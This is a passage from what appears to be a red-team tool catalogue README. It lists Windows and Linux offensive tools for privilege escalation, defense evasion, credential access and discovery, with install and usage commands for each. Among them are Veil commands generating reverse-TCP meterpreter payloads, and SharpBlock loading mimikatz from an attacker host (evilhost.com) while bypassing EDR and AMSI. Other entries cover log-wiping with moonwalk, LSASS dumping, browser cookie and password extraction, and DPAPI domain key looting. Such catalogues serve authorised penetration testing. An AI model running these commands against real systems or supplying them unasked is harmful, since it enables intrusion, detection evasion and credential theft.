passwords\nGet-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png)\n\n### [πŸ”™](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)\n\nPowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.\n\n*Supports:*\n\n- MS10-015 : User Mode to Ring (KiTrap0D)\n- MS10-092 : Task Scheduler\n- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow\n- MS13-081 : TrackPopupMenuEx Win32k NULL Page\n- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference\n- MS15-051 : ClientCopyImage Win32k\n- MS15-078 : Font Driver Buffer Overflow\n- MS16-016 : 'mrxdav.sys' WebDAV\n- MS16-032 : Secondary Logon Handle\n- MS16-034 : Windows Kernel-Mode Drivers EoP\n- MS16-135 : Win32k Elevation of Privilege\n- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc\n\n**Install: (PowerShell)** \n\n```bash\n# Git install\ngit clone https://github.com/rasta-mouse/Sherlock\n\n# Load powershell module\nImport-Module -Name C:\\INSTALL_LOCATION\\Sherlock\\Sherlock.ps1\n```\n\n**Usage: (PowerShell)** \n\n```bash\n# Run all functions\nFind-AllVulns\n\n# Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)\nFind-MS14058\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png)\n\n*Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*\n\n### [πŸ”™](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)\n\nWatson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.\n\nGreat for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.\n\n**Install:** \n\nUsing [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the [Watson project .sln](https://github.com/rasta-mouse/Watson), choose \"Release\", and build.\n\n**Usage:** \n\n```bash\n# Run all checks\nWatson.exe\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png)\n\n*Image text used from https://github.com/rasta-mouse/Watson#usage*\n\n### [πŸ”™](#tool-list)[ImpulsiveDLLHijack](https://github.com/knight0x07/ImpulsiveDLLHijack)\n\nA C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries. \n\nThe discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.\n\n**Install:** \n\n- **Procmon.exe** -\u003e https://docs.microsoft.com/en-us/sysinternals/downloads/procmon\n- **Custom Confirmatory DLL's** :\n\t- These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path \n\t- Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)\n\t- 32Bit dll name should be: maldll32.dll\n\t- 64Bit dll name should be: maldll64.dll\n\t- Install NuGet Package:** PeNet** -\u003e https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)\n\n**Note: i \u0026 ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.**\n\n- **Build and Setup Information:**\n\n\t- **ImpulsiveDLLHijack**\n\n\t\t- Clone the repository in Visual Studio\n\t\t- Once project is loaded in Visual Studio go to \"Project\" --\u003e \"Manage NuGet packages\" --\u003e Browse for packages and install \"PeNet\" -\u003e https://www.nuget.org/packages/PeNet/\n\t\t- Build the project!\n\t\t- The ImpulsiveDLLHijack.exe will be inside the bin directory.\n\n\t- **And for Confirmatory DLL's:**\n\n\t\t- Clone the repository in Visual Studio\n\t\t- Build the project with x86 and x64\n\t\t- Rename x86 release as maldll32.dll and x64 release as maldll64.dll\n\n\t- **Setup:** Copy the Confirmatory DLL's (maldll32 \u0026 maldll64) in the ImpulsiveDLLHijack.exe directory \u0026 then execute ImpulsiveDLLHijack.exe :))\n\n*Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites*\n\n**Usage:** \n\n```bash\n# Help\nImpulsiveDLLHijack.exe -h\n\n# Look for vulnerabilities in an executable \nImpulsiveDLLHijack.exe -path BINARY_PATH\n```\n\nUsage examples can be found [here](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).\n\n![image](https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png)\n\n*Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples*\n\n### [πŸ”™](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)\n\nA C# tool to dump all sorts of goodies from AD FS.\n\nCreated by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye.\n\nThis tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.\n\n**Requirements:**\n\n- ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.\n- ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.\n- ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.\n\n**Install: (Compile)** \n\nADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose \"Release\", and build.\n\n**Usage: (Flags)** \n\n```bash\n# The Active Directory domain to target. Defaults to the current domain.\n/domain:\n\n# The Domain Controller to target. Defaults to the current DC.\n/server:\n\n# Switch. Toggle to disable outputting the DKM key.\n/nokey\n\n# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.\n/database\n```\n\n[Blog - Exploring the Golden SAML Attack Against ADFS](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)\n\n![image](https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png)\n\n*Image used from https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs*\n\n### [πŸ”™](#tool-list)[BeRoot](https://github.com/AlessandroZ/BeRoot)\n\nBeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.\n\nThe goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment.\n\nThis project works on Windows, Linux and Mac OS.\n\n**Install: (Linux)** \n\n```bash\ngit clone https://github.com/AlessandroZ/BeRoot\ncd BeRoot/Linux/\n```\n\n**Install: (Windows)** \n\nA pre-compiled version of BeRoot can be found [here](https://github.com/AlessandroZ/BeRoot/releases).\n\n**Usage:** \n\n```bash\n# Run BeRoot\npython beroot.py\n\n# Run BeRoot with user password (If you know the password use it, you could get more results)\npython beroot.py --password super_strong_password\n```\n\nFurther information can be found here for:\n\n- [Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\n- [Windows](https://github.com/AlessandroZ/BeRoot/tree/master/Windows)\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/4c84ffeb-1ffb-474a-b028-4c8fcc64deb6)\n\n*Image used from https://github.com/AlessandroZ/BeRoot*\n\nDefense Evasion\n====================\n\n### [πŸ”™](#tool-list)[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)\n\nA PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.\n\n**Install:** \n\n```bash\ngit clone https://github.com/danielbohannon/Invoke-Obfuscation.git\n```\n\n**Usage:** \n\n```bash\n./Invoke-Obfuscation\n```\n\n![image](https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png)\n\n### [πŸ”™](#tool-list)[Veil](https://github.com/Veil-Framework/Veil)\n\nVeil is a tool for generating metasploit payloads that bypass common anti-virus solutions.\n\nIt can be used to generate obfuscated shellcode, see the official [veil framework blog](https://www.veil-framework.com/) for more info.\n\n**Install: (Kali)** \n\n```bash\napt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\n```\n\n**Install: (Git)** \n\n```bash\nsudo apt-get -y install git\ngit clone https://github.com/Veil-Framework/Veil.git\ncd Veil/\n./config/setup.sh --force --silent\n```\n\n**Usage:** \n\n```bash\n# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-payloads\n\n# List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-encoders\n\n# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234\n./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234\n\n# List all payloads (–list-payloads) for the tool Evasion (-t Evasion)\n./Veil.py -t Evasion --list-payloads\n\n# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris\n./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris\n```\n\nVeil creators wrote a nice [blog post](https://www.veil-framework.com/veil-command-line-usage/) explaining further ordnance and evasion command line usage.\n\n![image](https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png)\n\n### [πŸ”™](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)\n\nA method of bypassing EDR's active projection DLL's by preventing entry point execution.\n\n**Features:**\n\n- Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.\n- Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.\n- Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).\n- Implanted process is hidden to help evade scanners looking for hollowed processes.\n- Command line args are spoofed and implanted after process creation using stealthy EDR detection method.\n- Patchless ETW bypass.\n- Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space.\n\n**Install:** \n\nUse [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) to compile the SharpBlock binary.\n\nOpen the SharpBlock [project .sln](https://github.com/CCob/SharpBlock), choose \"Release\", and build.\n\n**Usage:** \n\n```bash\n# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\nSharpBlock -e http://evilhost.com/mimikatz.bin -s c:\\windows\\system32\\notepad.exe -d \"Active Protection DLL for SylantStrike\" -a coffee\n\n# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\nexecute-assembly SharpBlock.exe -e \\\\.\\pipe\\mimi -s c:\\windows\\system32\\notepad.exe -d \"Active Protection DLL for SylantStrike\" -a coffee\nupload_file /home/haxor/mimikatz.exe \\\\.\\pipe\\mimi\n```\n\nNice PenTestPartners blog post [here](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/).\n\n![image](https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png)\n\n*Image used from https://youtu.be/0W9wkamknfM*\n\n### [πŸ”™](#tool-list)[Alcatraz](https://github.com/weak1337/Alcatraz)\n\nAlcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:\n\n- .exe\n- .dll\n- .sys\n\nSome supported obfuscation features include:\n\n- Obfuscation of immediate moves\n- Control flow flattening\n- ADD mutation\n- Entry-point obfuscation\n- Lea obfuscation\n\n**Install: (Requirements)** \n\nInstall: https://vcpkg.io/en/getting-started.html\n\n```bash\nvcpkg.exe install asmjit:x64-windows\nvcpkg.exe install zydis:x64-windows\n```\n\n**Usage:** \n\nUsing the GUI to obfuscate a binary:\n\n1. Load a binary by clicking `file` in the top left corner.\n2. Add functions by expanding the `Functions` tree. (You can search by putting in the name in the searchbar at the top)\n3. Hit `compile` (**Note:** *Obfuscating lots of functions might take some seconds*)\n\n![image](https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png)\n\n*Image used from https://github.com/weak1337/Alcatraz*\n\n### [πŸ”™](#tool-list)[Mangle](https://github.com/optiv/Mangle)\n\nMangle is a tool that manipulates aspects of compiled executables (.exe or DLL). \n\nMangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. \n\nIn doing so, Mangle helps loaders evade on-disk and in-memory scanners.\n\n**Install:** \n\nThe first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:\n\n```\ngo get github.com/Binject/debug/pe\n```\n\nThen build it\n\n```\ngit clone https://github.com/optiv/Mangle\ncd Mangle\ngo build Mangle.go\n```\n\n**Usage:** \n\n```bash\n -C string\n Path to the file containing the certificate you want to clone\n -I string\n Path to the orginal file\n -M Edit the PE file to strip out Go indicators\n -O string\n The new file name\n -S int\n How many MBs to increase the file by\n```\n\nFull usage information can be found [here](https://github.com/optiv/Mangle#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png)\n\n*Image used from https://github.com/optiv/Mangle*\n\n### [πŸ”™](#tool-list)[AMSI Fail](http://amsi.fail/)\n\nAMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process. \n\nThe snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.\n\nNice f-secure blog explaining AMSI [here](https://blog.f-secure.com/hunting-for-amsi-bypasses/).\n\n![image](https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png)\n\n*Image used from http://amsi.fail/*\n\n### [πŸ”™](#tool-list)[ScareCrow](https://github.com/optiv/ScareCrow)\n\nScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). \n\nOnce the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory.\n\nWhen executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\\Windows\\System32\\`. These DLLs are stored on disk β€œclean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered.\n\nNice blogs for learning about techniques utilized by ScareCrow:\n\n- [Endpoint Detection and Response: How Hackers Have Evolved](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved)\n- [EDR and Blending In: How Attackers Avoid Getting Caught](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught)\n\n**Install:** \n\n*ScareCrow requires golang 1.16.1 or later to compile loaders.*\n\n```bash\n# Clone\ngit clone https://github.com/optiv/ScareCrow\ncd ScareCrow\n\n# Install dependencies\ngo get github.com/fatih/color\ngo get github.com/yeka/zip\ngo get github.com/josephspurrier/goversioninfo\n\n# Required\nopenssl\nosslsigncode\nmingw-w64\n\n# Build\ngo build ScareCrow.go\n```\n\n**Usage:** \n\n```\nUsage of ./ScareCrow:\n -I string\n Path to the raw 64-bit shellcode.\n -Loader string\n Sets the type of process that will sideload the malicious payload:\n [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)\n [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.\n [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.\n [*] excel - Loads into a hidden Excel process using a JScript loader.\n [*] msiexec - Loads into MSIexec process using a JScript loader.\n [*] wscript - Loads into WScript process using a JScript loader. (default \"binary\")\n -O string\n Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.\n -configfile string\n The path to a json based configuration file to generate custom file attributes. This will not use the default ones.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n...\n```\n\nFull usage information can be found [here](https://github.com/optiv/ScareCrow#loader).\n\n![image](https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png)\n\n*Image used from https://github.com/optiv/ScareCrow*\n\n### [πŸ”™](#tool-list)[moonwalk](https://github.com/mufeedvh/moonwalk)\n\nmoonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine. \n\nIt saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.\n\n**Install:** \n\n```bash\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\n```\n\n**Usage:** \n\n```bash\n# Start moonwalk straight after getting a shell on the victim Linux endpoint\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\nchmod +x moonwalk\nmoonwalk start\n\n# Once you are finished, clear your traces \nmoonwalk finish\n```\n\n![image](https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png)\n\n*Image used from https://github.com/mufeedvh/moonwalk*\n\nCredential Access\n====================\n\n### [πŸ”™](#tool-list)[Mimikatz](https://github.com/gentilkiwi/mimikatz)\n\nGreat tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.\n\n**Install:** \n\n1. Download the [mimikatz_trunk.7z](https://github.com/gentilkiwi/mimikatz/releases) file.\n2. Once downloaded, the `mimikatz.exe` binary is in the `x64` folder.\n\n**Usage:** \n\n```bash\n.\\mimikatz.exe\nprivilege::debug\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png)\n\n### [πŸ”™](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)\n\nNice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.\n\n**Install: (Binary)** \n\nYou can install the standalone binary from [here](https://github.com/AlessandroZ/LaZagne/releases/).\n\n**Usage:** \n\n```bash\n# Launch all modes\n.\\laZagne.exe all\n\n# Launch only a specific module\n.\\laZagne.exe browsers\n\n# Launch only a specific software script\n.\\laZagne.exe browsers -firefox\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png)\n\n\n### [πŸ”™](#tool-list)[hashcat](https://github.com/hashcat/hashcat)\n\nTool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found [here](https://hashcat.net/wiki/doku.php?id=example_hashes)).\n\n**Install: Binary** \n\nYou can install the standalone binary from [here](https://hashcat.net/hashcat/).\n\n**Usage:** \n\n```bash\n.\\hashcat.exe --help\n```\n\nNice hashcat command [cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/).\n\n![image](https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png)\n\n### [πŸ”™](#tool-list)[John the Ripper](https://github.com/openwall/john)\n\nAnother password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.\n\n**Install:** \n\n```bash\nsudo apt-get install john -y\n```\n\n**Usage:** \n\n```bash\njohn\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png)\n\n### [πŸ”™](#tool-list)[SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt)\n\nThis tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.\n\nNCC blog post - ['SCOMplicated? – Decrypting SCOM β€œRunAs” credentials'](https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/)\n\n**Pre-requisites:** \n\nTo run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key:\n\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\MOMBins\n```\n\nYou can check manually that you can see the database by gathering the connection details from the following keys:\n\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseServerName\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseName\n```\n\n**Install: (PS1)** \n\n```\ngit clone https://github.com/nccgroup/SCOMDecrypt\ncd .\\SCOMDecrypt\\SCOMDecrypt\\\n. .\\Invoke-SCOMDecrypt.ps1\n```\n\n**Install: (Compile)** \n\nUsing [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) you can compile the SCOMDecrypt binary. \n\nOpen the SCOMDecrypt [project .sln](https://github.com/nccgroup/SCOMDecrypt), choose \"Release\", and build.\n\n**Usage:** \n\n```bash\n# PS1\nInvoke-SCOMDecrypt\n\n# Compiled C# binary\n.\\SCOMDecrypt.exe\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png)\n\n*Image text used from https://github.com/nccgroup/SCOMDecrypt*\n\n### [πŸ”™](#tool-list)[nanodump](https://github.com/helpsystems/nanodump)\n\nThe LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.\n\nCreating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.\n\nThis allows for the creation of a minidump of the LSASS process.\n\n**Install:** \n\n```bash\ngit clone https://github.com/helpsystems/nanodump.git\n```\n\n**Install: (Linux with MinGW)** \n\n```bash\nmake -f Makefile.mingw\n```\n\n**Install: (Windows with MSVC)** \n\n```bash\nnmake -f Makefile.msvc\n```\n\n**Install: (CobaltStrike only)**\n\nImport the `NanoDump.cna` script on Cobalt Strike.\n\nFull installation information can be found [here](https://github.com/helpsystems/nanodump).\n\n**Usage:** \n\n```bash\n# Run\nnanodump.x64.exe\n\n# Leverage the Silent Process Exit technique\nnanodump --silent-process-exit C:\\Windows\\Temp\\\n\n# Leverage the Shtinkering technique\nnanodump --shtinkering\n```\n\nFull usage information can be found [here](https://github.com/helpsystems/nanodump#1-usage).\n\n![nanodump](https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg)\n\n*Image used from https://github.com/helpsystems/nanodump*\n\n### [πŸ”™](#tool-list)[eviltree](https://github.com/t3l3machus/eviltree)\n\nA standalone python3 remake of the classic \"tree\" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:\n\n- While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.\n- `tree` is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).\n\n**Install:** \n\n```bash\ngit clone https://github.com/t3l3machus/eviltree\n```\n\n**Usage:** \n\n```bash\n# Running a regex that essentially matches strings similar to: password = something against /var/www\npython3 eviltree.py -r /var/www -x \".{0,3}passw.{0,3}[=]{1}.{0,18}\" -v\n\n# Using comma separated keywords instead of regex\npython3 eviltree.py -r C:\\Users\\USERNAME -k passw,admin,account,login,user -L 3 -v\n```\n\n![image](https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png)\n\n*Image used from https://github.com/t3l3machus/eviltree*\n\n### [πŸ”™](#tool-list)[SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief)\n\nSimple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials. \n\nWill also optionally enumerate active directory users from the UDS API.\n\n[Blog - Exploiting common misconfigurations in cisco phone systems](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/)\n\n**Install:** \n\n```bash\ngit clone https://github.com/trustedsec/SeeYouCM-Thief\npython3 -m pip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n# Enumerate Active Directory users from the UDS api on the CUCM\n./thief.py -H \u003cCUCM server\u003e --userenum\n\n# Without specifying a phone IP address the script will attempt to download every config in the listing.\n./thief.py -H \u003cCisco CUCM Server\u003e [--verbose]\n\n# Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.\n./thief.py --phone \u003cCisco IP Phoner\u003e [--verbose]\n\n# Specify a subnet to scan with reverse lookups.\n./thief.py --subnet \u003csubnet to scan\u003e [--verbose]\n```\n\n![image](https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png)\n\n*Image used from https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/*\n\n### [πŸ”™](#tool-list)[MailSniper](https://github.com/dafthack/MailSniper)\n\nMailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.\n\nMailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.\n\nNice blog post with more information about [here](https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/).\n\n[MailSniper Field Manual](http://www.dafthack.com/files/MailSniper-Field-Manual.pdf)\n\n**Install:** \n\n```\ngit clone https://github.com/dafthack/MailSniper\ncd MailSniper\nImport-Module MailSniper.ps1\n```\n\n**Usage:** \n\n```bash\n# Search current users mailbox\nInvoke-SelfSearch -Mailbox current-user@domain.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png)\n\n*Image used from https://patrowl.io/*\n\n### [πŸ”™](#tool-list)[SharpChromium](https://github.com/djhohnstein/SharpChromium)\n\nSharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:\n\n- Cookies (in JSON format)\n- History (with associated cookies for each history item)\n- Saved Logins\n\nThis rewrite has several advantages to previous implementations, which include:\n\n- No Type compilation or reflection required\n- Cookies are displayed in JSON format, for easy importing into Cookie Editor.\n- No downloading SQLite assemblies from remote resources.\n- Supports major Chromium browsers (but extendable to others)\n\n**Install:** \n\nUsing [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/).\n\nOpen up the project .sln, choose \"release\", and build.\n\n**Usage:** \n\n```bash\n# Retrieve cookies associated with Google Docs and Github\n.\\SharpChromium.exe cookies docs.google.com github.com\n\n# Retrieve history items and their associated cookies.\n.\\SharpChromium.exe history\n\n# Retrieve saved logins (Note: Only displays those with non-empty passwords):\n.\\SharpChromium.exe logins\n```\n\n![image](https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png)\n\n*Image used from https://github.com/djhohnstein/SharpChromium*\n\n### [πŸ”™](#tool-list)[dploot](https://github.com/zblurx/dploot)\n\nDPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc) we just need access to a password.\n\ndploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.\n\n[Blog - Operational Guidance for Offensive User DPAPI Abuse](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107)\n\n**Install: (Pip)** \n\n```bash\npip install dploot\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/zblurx/dploot.git\ncd dploot\nmake\n```\n\n**Usage:** \n\n```bash\n# Loot decrypted machine private key files as a Windows local administrator \ndploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet\n\n# Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)\ndploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet\n\n# Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints\ndploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet \n```\n\nDiscovery\n====================\n\n### [πŸ”™](#tool-list)[PCredz](https://github.com/lgandx/PCredz)\n\nThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n**Install:** \n\n```bash\ngit clone https://github.com/lgandx/PCredz\n```\n\n**Usage:** (PCAP File Folder) \n\n```python\npython3 ./Pcredz -d /tmp/pcap-directory-to-parse/\n```\n\n**Usage:** (Live Capture) \n\n```python\npython3 ./Pcredz -i eth0 -v\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png)\n\n### [πŸ”™](#tool-list)[PingCastle](https://github.com/vletoux/pingcastle)\n\nPing Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.\n\n**Install:** (Download) \n\n```\nhttps://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip\n```\n\n**Usage:** 